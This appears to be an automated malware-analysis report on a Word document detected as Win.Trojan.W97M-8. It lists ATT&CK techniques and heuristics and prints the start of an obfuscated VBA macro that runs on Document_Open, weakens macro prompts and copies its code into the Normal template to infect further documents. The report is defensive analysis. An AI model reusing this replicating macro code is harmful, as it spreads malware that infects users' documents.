MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. Static analysis detected the presence of VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon document opening. The VBA script is heavily obfuscated, but its presence and the Document_Open trigger strongly suggest it is designed to download and execute a secondary payload.
Heuristics 3
-
ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.W97M-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 85374 bytes |
SHA-256: 5b9d93a814451ab4a2ba985fc21abc16a9e394cb3b3dc9d31d237313b3808bed |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
ľĎÍ‹¸†şšä Ž´ĐĂçۇ¬Ăâć» = "©ęčÚŁŔŔ˛"
±ŽÔŠ×ÄŚ = "ÔńÁΓ”ĄÚÇÁ"
ׂ´®ĆśĘŤÚčęÔ = "�Ť«đŁŻé"
ąđ”ŚÁę»˝’—’”�Ş˛ĺ�ÜŇď’ÜŘŠĚ“ŚáĚŃ÷ÂíŁŐđŢŕʱ‡ë = "§ĎŮ‹ëĹŢ«ą¸č˝»őáłćŢ"
ŢNJDZőë‡Ű𮛸Âę°•čÜĄöË„±›ň߸µîᗤǣ = "¤ç˝„‹‰â—żÚ"
ÚÉÚą‡ß„ş¦�ť˝ŇôąŐŰ�‘ = "ń÷ě®çŔŕßĺ·ť÷ŘéČĂĆö”"
äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬‰Ę�’Č‹łÜ˘ś”ŚŻ…�í = "Ů”«őŻśů"
ŻúđŤŕňµ‰«ôéˡČ÷ÝĎě¤ĎęČżˇŞşäĆ = "Ś"
ŹÄ©¨ÄĆł•˘Î뵟‡™ůŃĹŃÔŠść奝¸�ô±¦«Śť„ = "µŘŕßĵ�˛–ěÁ"
Ó핯ćËřľŻŘČźź†ľ†ŐŚ§Ô¨ˇŁ�ĐĽî–™Ŕ÷ĺ𫚚ń = "ĽăĂíÉĘŤ´ă¤ôó"
öř¨¨ő = "ň"
�Ţθ°Č¸î¶˛´·ë = "«ę§íżµĘä«ŔÇďĂ•·Čö˘ň"
ßťŻŇÉÍô‡Ő ČďŕŽŮ–̜ŘŢĂžęô‰ńÔ«â = "˛žĚ"
··¨ű¦Ú›Ŕ®†ŕŐÍ•Ą÷ĽÂÁÜʨ̣Á–í¸ö…˛źŁ¦Ň˛§µ = "šËçÍöˇ• ¸"
…Шš§Éžö´ˇď�Ŕ·›ˇÚäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬â“•úÇąÔŕĄŢ÷ö±Č = "¸íľŞÄ"
öř¨¨Č‚±¦§ŚÎú÷Íś�Ő»Ž« = "Ďß…ÚŹăĹä쏯¸"
ČúôŞňÎú¸Ŕ‹Ţ�Ę™»×»ěéɸ Ö”úů™›ćóŞŠĽ©ŇըЄóŕŚ”ś‰čőáÔ™§±¸ = "ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�˝äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬…ńµťÖÖ"
¦‚ŠÁęɦµŮż ň¤çÁÚ†żčňÇ’‚Žë„ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�„Ô݉™ŻŐč´ÓÖ±¤ = "ŕßÓכ˝±„„“�Ę�"
¬¶�ʶ“‘»ŁđÂƤ”Ě‹ČŕŽ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜŤˇ¤ľšÉˇä̛ŦËé = "”뎱”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ŽĹň"
Çôű«ĺÔšĹÇÉěŔĽˇĂË´ŤŔšźŞČŘŽäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬˝Úá°”ľŰšŽŢĹ”ĎÁĹť = "íéćůĘ›Ŕ‘„Ů»žă"
Ş”ßŇťË¨Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�áŃźúť䉵鹇‡‹ľÁ‡˝ĽÚ‚¦ = "˛ŹŃ˛‚–ܡ츔˝ĎÓ¶Ž"
ĐäÇŻľďžŹ…Ó”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�‡ŁĄ�ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ő×˝¸ĘŽďäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬ = "ŹşŮŞ"
ß‹ČäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĎŠřô†ĚźˇľąůŠŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�™Ýŕ–ßÝ�Ó‰Ýç„…ě˝ŕë = "»ď��äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬Ëđ©�ŹŻ§ŹŁÔ"
’čĐ“†ůŕĆŹ’›…„§ŻäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬»˝éş = "ˇ›ę´Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ąó‹™×ď˛đ�"
ÇéŰęÝô¨í‚¸ô‡ËĆčçąŮťęŰŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ň쵚„Ţ = "�އᱥŞ"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµůĚŰ–ň”Ä = "§›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü“ö•éצµľ„§äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬ë"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµ×‚´®ĆÚôׂ´®Ćި踖жňŮ = "¦ÜßçĹŔĎ‘Żť¨Ë�"
Ýĺ ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Üę«öř¨¨Ž±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ŞĘޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ş¬Ş×‚´®Ć‚ëظžµŮ˘ÉЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ›¨ = "Źé´¶ŽÂ™źâⵞ§äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬†ž†ĘŚ‘±ŕ�°ęžâŢ߸â–âă’ęđĄáĺ¨Ý“çáń™ńÄßŔ˝…ąŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ęćơŰ"
�Űׂ´®Ćö˝˝öů–›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´ÜĽÚěÜčČéµĆ¨ĺڥׂ´®Ć˘Ôş›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Üď = "´�ĶźÂő§ö˘ďç"
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines
§Ô†ń…ÖŚôŮ = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines
Application.Options.VirusProtection = True
WordBasic.DisableAutoMacros 1
Options.SaveNormalPrompt = True
If ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� > 169 And §Ô†ń…ÖŚôŮ > 169 Then Exit Sub
If §Ô†ń…ÖŚôŮ > 169 Then
Set ЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ› = ActiveDocument
Set ±÷żřĘŔźř路Ą�ŕ = NormalTemplate
GoTo •öř¨¨Ę¨Ä ÖĚÓŮŁˇµ�ÁŔŇé§’ë ±ĺ
End If
If §Ô†ń…ÖŚôŮ < 170 Then
Set ЬŔ‡Î©÷Ű’Čš×őř«Ú¤±•÷Ż…ŚĚŽĺ› = NormalTemplate
Set ±÷żřĘŔźř路Ą�ŕ = ActiveDocument
End If
ReDim Öׂ´®Ć¦šŽ±”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�ľĆëÝćł�ł–¦¶“đĄĹĹéß(50, 50)
›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü = ±÷żřĘŔźř路Ą�ŕ.VBProject.VBComponents(1).CodeModule.countoflines
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = 0
Do Until ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ›˛¸äźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬áóČß…°‡›©‹ňÎĦÄÜ´Ü
ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� = ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬� + 1
ĐäÇŻľďžŹ…Óîׂ´®Ć‡ŁĄ�ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉđČ”ľĐ†˛˝é´éżĆÄ–¬�Ő×˝¸ = ±÷żřĘŔźř路Ą�ŕ.VBProject.VBComponents(1).CodeModule.Lines(ޱ”ëŮČžÓľĘäźÄ˝ä”ٶÉ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.